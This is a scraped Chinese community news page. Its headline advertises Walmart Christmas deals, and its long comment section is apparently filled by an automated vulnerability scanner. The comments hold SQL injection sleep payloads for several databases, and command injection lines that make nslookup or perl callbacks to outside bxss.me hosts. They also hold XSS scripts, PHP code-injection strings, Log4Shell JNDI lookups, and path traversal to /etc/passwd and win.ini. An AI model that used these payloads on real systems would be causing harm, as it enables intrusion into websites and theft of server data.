Walmart优惠出炉,部分已开抢!55寸电视$398,乐高$34.97,空气炸锅$48,戴森V8吸尘器$399.98,Switch游戏机$379.99!

2021-12-20 渥太华微生活

二维码 | 渥太华微生活

编者注:新闻取自各大新闻媒体,新闻内容并不代表本网立场!文字和图片来自网络,版权归原作者所有。如有侵权,请速联系小编,立即删除。

1555
全部评论 (151)
1 发表评论于:2022-04-23 03:59:20
@@Gpvfk
1 发表评论于:2022-04-23 03:59:16
1'"
1 发表评论于:2022-04-23 03:59:15
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1 发表评论于:2022-04-23 03:59:12
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1 发表评论于:2022-04-23 03:59:09
oRDJEDrA')) OR 655=(SELECT 655 FROM PG_SLEEP(15))--
1 发表评论于:2022-04-23 03:59:07
laNE31pO') OR 49=(SELECT 49 FROM PG_SLEEP(15))--
1 发表评论于:2022-04-23 03:59:04
C6iELjHu' OR 699=(SELECT 699 FROM PG_SLEEP(15))--
1 发表评论于:2022-04-23 03:59:01
-1)) OR 591=(SELECT 591 FROM PG_SLEEP(15))--
1 发表评论于:2022-04-23 03:58:59
-5) OR 68=(SELECT 68 FROM PG_SLEEP(15))--
1 发表评论于:2022-04-23 03:58:58
-5 OR 145=(SELECT 145 FROM PG_SLEEP(15))--
1 发表评论于:2022-04-23 03:58:55
BJT8XLMA'; waitfor delay '0:0:15' --
1 发表评论于:2022-04-23 03:58:53
1 waitfor delay '0:0:15' --
1 发表评论于:2022-04-23 03:58:51
-1); waitfor delay '0:0:15' --
1 发表评论于:2022-04-23 03:58:50
-1; waitfor delay '0:0:15' --
1 发表评论于:2022-04-23 03:58:48
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1 发表评论于:2022-04-23 03:58:45
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1 发表评论于:2022-04-23 03:58:42
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1 发表评论于:2022-04-23 03:58:38
if(now()=sysdate(),sleep(15),0)
1 发表评论于:2022-04-23 03:58:36
-1" OR 2+571-571-1=0+0+0+1 --
1 发表评论于:2022-04-23 03:58:34
-1' OR 2+484-484-1=0+0+0+1 or 'JCegqrEb'='
1 发表评论于:2022-04-23 03:58:32
-1' OR 2+531-531-1=0+0+0+1 --
1 发表评论于:2022-04-23 03:58:30
-1 OR 2+985-985-1=0+0+0+1
1 发表评论于:2022-04-23 03:58:28
-1 OR 2+317-317-1=0+0+0+1 --
1 发表评论于:2022-04-23 03:58:26
BB83IPNa
1 发表评论于:2022-04-23 03:58:24
555
1 发表评论于:2022-04-23 03:58:23
555
@@Za3RU 发表评论于:2022-04-23 03:58:21
555
1'" 发表评论于:2022-04-23 03:58:17
555
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 发表评论于:2022-04-23 03:58:15
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) 发表评论于:2022-04-23 03:58:13
555
CipZZwIB')) OR 386=(SELECT 386 FROM PG_SLEEP(15))-- 发表评论于:2022-04-23 03:58:11
555
CB119n8F') OR 490=(SELECT 490 FROM PG_SLEEP(15))-- 发表评论于:2022-04-23 03:58:08
555
t32GoSKe' OR 859=(SELECT 859 FROM PG_SLEEP(15))-- 发表评论于:2022-04-23 03:58:05
555
-1)) OR 717=(SELECT 717 FROM PG_SLEEP(15))-- 发表评论于:2022-04-23 03:58:03
555
-5) OR 10=(SELECT 10 FROM PG_SLEEP(15))-- 发表评论于:2022-04-23 03:58:02
555
-5 OR 202=(SELECT 202 FROM PG_SLEEP(15))-- 发表评论于:2022-04-23 03:58:00
555
wFdFOruU'; waitfor delay '0:0:15' -- 发表评论于:2022-04-23 03:57:57
555
1 waitfor delay '0:0:15' -- 发表评论于:2022-04-23 03:57:56
555
-1); waitfor delay '0:0:15' -- 发表评论于:2022-04-23 03:57:54
555
-1; waitfor delay '0:0:15' -- 发表评论于:2022-04-23 03:57:53
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 发表评论于:2022-04-23 03:57:48
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 发表评论于:2022-04-23 03:57:47
555
1 发表评论于:2022-04-23 03:57:46
5559319405
1 发表评论于:2022-04-23 03:57:45
;(nslookup hitnglavkahsx0ddf1.bxss.me||perl -e "gethostbyname('hitnglavkahsx0ddf1.bxss.me')")|(nslookup hitnglavkahsx0ddf1.bxss.me||perl -e "gethostbyname('hitnglavkahsx0ddf1.bxss.me')")&(nslookup hitnglavkahsx0ddf1.bxss.me||perl -e "gethostbyname('hitnglavkahsx0ddf1.bxss.me')")
if(now()=sysdate(),sleep(15),0) 发表评论于:2022-04-23 03:57:45
555
-1" OR 2+308-308-1=0+0+0+1 -- 发表评论于:2022-04-23 03:57:43
555
1 发表评论于:2022-04-23 03:57:42
`(nslookup hitazszqksvkj7528e.bxss.me||perl -e "gethostbyname('hitazszqksvkj7528e.bxss.me')")`
-1' OR 2+587-587-1=0+0+0+1 or 'xjoXNW2w'=' 发表评论于:2022-04-23 03:57:41
555
1 发表评论于:2022-04-23 03:57:41
|(nslookup hithkcujaejxpbdb27.bxss.me||perl -e "gethostbyname('hithkcujaejxpbdb27.bxss.me')")
-1' OR 2+695-695-1=0+0+0+1 -- 发表评论于:2022-04-23 03:57:39
555
1 发表评论于:2022-04-23 03:57:38
&(nslookup hitytmqvrlaex38871.bxss.me||perl -e "gethostbyname('hitytmqvrlaex38871.bxss.me')")&'\"`0&(nslookup hitytmqvrlaex38871.bxss.me||perl -e "gethostbyname('hitytmqvrlaex38871.bxss.me')")&`'
-1 OR 2+171-171-1=0+0+0+1 发表评论于:2022-04-23 03:57:38
555
1 发表评论于:2022-04-23 03:57:37
'"()&%<acx><ScRiPt >GszN(9601)</ScRiPt>
1 发表评论于:2022-04-23 03:57:37
$(nslookup hitsqgjzlcndk7eda1.bxss.me||perl -e "gethostbyname('hitsqgjzlcndk7eda1.bxss.me')")
-1 OR 2+292-292-1=0+0+0+1 -- 发表评论于:2022-04-23 03:57:36
555
1 发表评论于:2022-04-23 03:57:35
(nslookup hitrgqqituwzc0cc5c.bxss.me||perl -e "gethostbyname('hitrgqqituwzc0cc5c.bxss.me')")
CMZh3k2H 发表评论于:2022-04-23 03:57:34
555
1 发表评论于:2022-04-23 03:57:33
|echo cncemg$()\ vqtpta\nz^xyu||a #' |echo cncemg$()\ vqtpta\nz^xyu||a #|" |echo cncemg$()\ vqtpta\nz^xyu||a #
1 发表评论于:2022-04-23 03:57:32
555
1 发表评论于:2022-04-23 03:57:30
555
1 发表评论于:2022-04-23 03:57:30
'.print(md5(31337)).'
1 发表评论于:2022-04-23 03:57:30
&echo ytxlgd$()\ csvfbg\nz^xyu||a #' &echo ytxlgd$()\ csvfbg\nz^xyu||a #|" &echo ytxlgd$()\ csvfbg\nz^xyu||a #
1 发表评论于:2022-04-23 03:57:28
${@print(md5(31337))}\
1 发表评论于:2022-04-23 03:57:28
echo cndpku$()\ osjqhw\nz^xyu||a #' &echo cndpku$()\ osjqhw\nz^xyu||a #|" &echo cndpku$()\ osjqhw\nz^xyu||a #
1 发表评论于:2022-04-23 03:57:26
${@print(md5(31337))}
1 发表评论于:2022-04-23 03:57:25
bxss.me
1 发表评论于:2022-04-23 03:57:25
";print(md5(31337));$a="
1 发表评论于:2022-04-23 03:57:23
';print(md5(31337));$a='
`(nslookup hittqdazahunya396d.bxss.me||perl -e "gethostbyname('hittqdazahunya396d.bxss.me')")` 发表评论于:2022-04-23 03:57:23
555
1 发表评论于:2022-04-23 03:57:23
555'"()&%<acx><ScRiPt >GszN(9503)</ScRiPt>
1 发表评论于:2022-04-23 03:57:21
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
|(nslookup hitclknashrrf8521d.bxss.me||perl -e "gethostbyname('hitclknashrrf8521d.bxss.me')") 发表评论于:2022-04-23 03:57:21
555
1 发表评论于:2022-04-23 03:57:20
Http://bxss.me/t/fit.txt
19071014 发表评论于:2022-04-23 03:57:19
555
'.print(md5(31337)).' 发表评论于:2022-04-23 03:57:19
555
$(nslookup hitiliiybuyjr66587.bxss.me||perl -e "gethostbyname('hitiliiybuyjr66587.bxss.me')") 发表评论于:2022-04-23 03:57:18
555
1 发表评论于:2022-04-23 03:57:18
1some_inexistent_file_with_long_name.jpg
${@print(md5(31337))}\ 发表评论于:2022-04-23 03:57:17
555
1 发表评论于:2022-04-23 03:57:17
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}//dns.log4j..-1720..33930${::-.}1${::-.}bxss.me}}
(nslookup hithneayocyiyad998.bxss.me||perl -e "gethostbyname('hithneayocyiyad998.bxss.me')") 发表评论于:2022-04-23 03:57:16
555
'"()&%<acx><ScRiPt >GszN(9348)</ScRiPt> 发表评论于:2022-04-23 03:57:16
555
${@print(md5(31337))} 发表评论于:2022-04-23 03:57:16
555
1 发表评论于:2022-04-23 03:57:15
<!--
bxss.me 发表评论于:2022-04-23 03:57:15
555
1 发表评论于:2022-04-23 03:57:15
../555
";print(md5(31337));$a=" 发表评论于:2022-04-23 03:57:14
555
1 发表评论于:2022-04-23 03:57:14
comment/.
1 发表评论于:2022-04-23 03:57:14
'"
http://bxss.me/t/fit.txt?.jpg 发表评论于:2022-04-23 03:57:13
555
1 发表评论于:2022-04-23 03:57:13
555
1'"()&%<acx><ScRiPt >GszN(9158)</ScRiPt> 发表评论于:2022-04-23 03:57:13
555
1 发表评论于:2022-04-23 03:57:13
${j${::-n}di:dns${::-:}//hitupstfsucwd6a85a${::-.}bxss.me}zzzz
1 发表评论于:2022-04-23 03:57:12
comment
<!-- 发表评论于:2022-04-23 03:57:12
555
Http://bxss.me/t/fit.txt 发表评论于:2022-04-23 03:57:12
555
';print(md5(31337));$a=' 发表评论于:2022-04-23 03:57:12
555
1 发表评论于:2022-04-23 03:57:11
../../../../../../../../../../../../../../windows/win.ini
'" 发表评论于:2022-04-23 03:57:11
555
1 发表评论于:2022-04-23 03:57:10
comment
1 发表评论于:2022-04-23 03:57:10
/xfs.bxss.me
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 发表评论于:2022-04-23 03:57:10
555
1some_inexistent_file_with_long_name.jpg 发表评论于:2022-04-23 03:57:10
555
1 发表评论于:2022-04-23 03:57:09
../../../../../../../../../../../../../../etc/passwd
1 发表评论于:2022-04-23 03:57:09
".gethostbyname(lc("hitij"."bdlodkfhe871a.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(83).chr(117).chr(82)."
1 发表评论于:2022-04-23 03:57:09
"+response.write(9827500*9487592)+"
1 发表评论于:2022-04-23 03:57:09
^(#[email protected]#$)(()))******
comment/. 发表评论于:2022-04-23 03:57:09
555
1 发表评论于:2022-04-23 03:57:09
'+'A'.concat(70-3).concat(22*4).concat(111).concat(84).concat(122).concat(69)+(require'socket' Socket.gethostbyname('hitrh'+'lijgikydc9335.bxss.me.')[3].to_s)+'
1 发表评论于:2022-04-23 03:57:08
bxss.me/t/xss.html?%00
/xfs.bxss.me 发表评论于:2022-04-23 03:57:08
555
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg 发表评论于:2022-04-23 03:57:08
555
../1 发表评论于:2022-04-23 03:57:08
555
1 发表评论于:2022-04-23 03:57:07
'"()
1 发表评论于:2022-04-23 03:57:07
'.gethostbyname(lc('hitwt'.'auqoplzkda6b7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(68).chr(112).chr(71).'
1 发表评论于:2022-04-23 03:57:07
!(()&&!|*|*|
1 发表评论于:2022-04-23 03:57:07
"+"A".concat(70-3).concat(22*4).concat(99).concat(90).concat(105).concat(76)+(require"socket" Socket.gethostbyname("hitnl"+"dtwycdkh9444c.bxss.me.")[3].to_s)+"
comment 发表评论于:2022-04-23 03:57:07
555
1 发表评论于:2022-04-23 03:57:07
'+response.write(9827500*9487592)+'
1 发表评论于:2022-04-23 03:57:07
HttP://bxss.me/t/xss.html?%00
1 发表评论于:2022-04-23 03:57:07
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1 发表评论于:2022-04-23 03:57:07
555
1 发表评论于:2022-04-23 03:57:06
)
comment 发表评论于:2022-04-23 03:57:06
555
1 发表评论于:2022-04-23 03:57:06
response.write(9827500*9487592)
bxss.me/t/xss.html?%00 发表评论于:2022-04-23 03:57:05
555
))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 发表评论于:2022-04-23 03:57:05
555
${j${::-n}di:dns${::-:}//hitzzqydytdlx7cd6c${::-.}bxss.me}zzzz 发表评论于:2022-04-23 03:57:05
555
../../../../../../../../../../../../../../windows/win.ini 发表评论于:2022-04-23 03:57:05
555
^(#[email protected]#$)(()))****** 发表评论于:2022-04-23 03:57:05
555
"+response.write(9315821*9107584)+" 发表评论于:2022-04-23 03:57:04
555
HttP://bxss.me/t/xss.html?%00 发表评论于:2022-04-23 03:57:04
555
../../../../../../../../../../../../../../etc/passwd 发表评论于:2022-04-23 03:57:04
555
'"() 发表评论于:2022-04-23 03:57:03
555
!(()&&!|*|*| 发表评论于:2022-04-23 03:57:03
555
'+response.write(9315821*9107584)+' 发表评论于:2022-04-23 03:57:03
555
) 发表评论于:2022-04-23 03:57:01
555
response.write(9315821*9107584) 发表评论于:2022-04-23 03:57:01
555
匿名天使 发表评论于:2022-04-23 03:57:01
555
1 发表评论于:2022-04-23 03:57:01
555&n905966=v973784
1 发表评论于:2022-04-23 03:57:00
VJsN2Awa
1 发表评论于:2022-04-23 03:57:00
${9999784+9999964}
1 发表评论于:2022-04-23 03:56:59
555
1 发表评论于:2022-04-23 03:56:59
1ClZhxQgO
7TAeb5Ai 发表评论于:2022-04-23 03:56:58
555
1<esi:include src="http://bxss.me/rpb.png"/> 发表评论于:2022-04-23 03:56:58
555
${9999035+9999941} 发表评论于:2022-04-23 03:56:58
555
1&n991411=v983953 发表评论于:2022-04-23 03:56:58
555
1 发表评论于:2022-04-23 03:56:57
555
1vC5q7oxO 发表评论于:2022-04-23 03:56:57
555
1 发表评论于:2022-04-23 03:56:56
555
1 发表评论于:2022-04-23 03:56:53
555
展开快速发表评论

优惠打折